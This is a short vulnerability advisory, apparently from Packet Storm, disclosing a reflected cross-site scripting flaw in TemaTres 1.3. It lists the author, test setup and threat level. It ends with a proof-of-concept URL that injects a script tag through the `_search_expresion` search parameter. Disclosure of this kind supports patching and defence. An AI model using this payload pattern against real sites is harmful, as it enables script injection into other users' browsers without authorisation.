TemaTres 1.3 Cross Site Scripting

2011-04-25T00:00:00
ID PACKETSTORM:100819
Type packetstorm
Reporter AutoSec Tools
Modified 2011-04-25T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................TemaTres 1.3  
Vulnerability...........Reflected Cross-site Scripting  
Threat Level............Low (1/5)  
Download................http://sourceforge.net/projects/tematres/  
Discovery Date..........4/25/2011  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
Email...................John Leitch <john@autosectools.com>  
------------------------------------------------------------------------  
  
  
--Description--  
  
A reflected cross-site scripting vulnerability in TemaTres 1.3 can be  
exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
  
http://localhost/tematres1.3/vocab/index.php?_search_expresion=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E  
`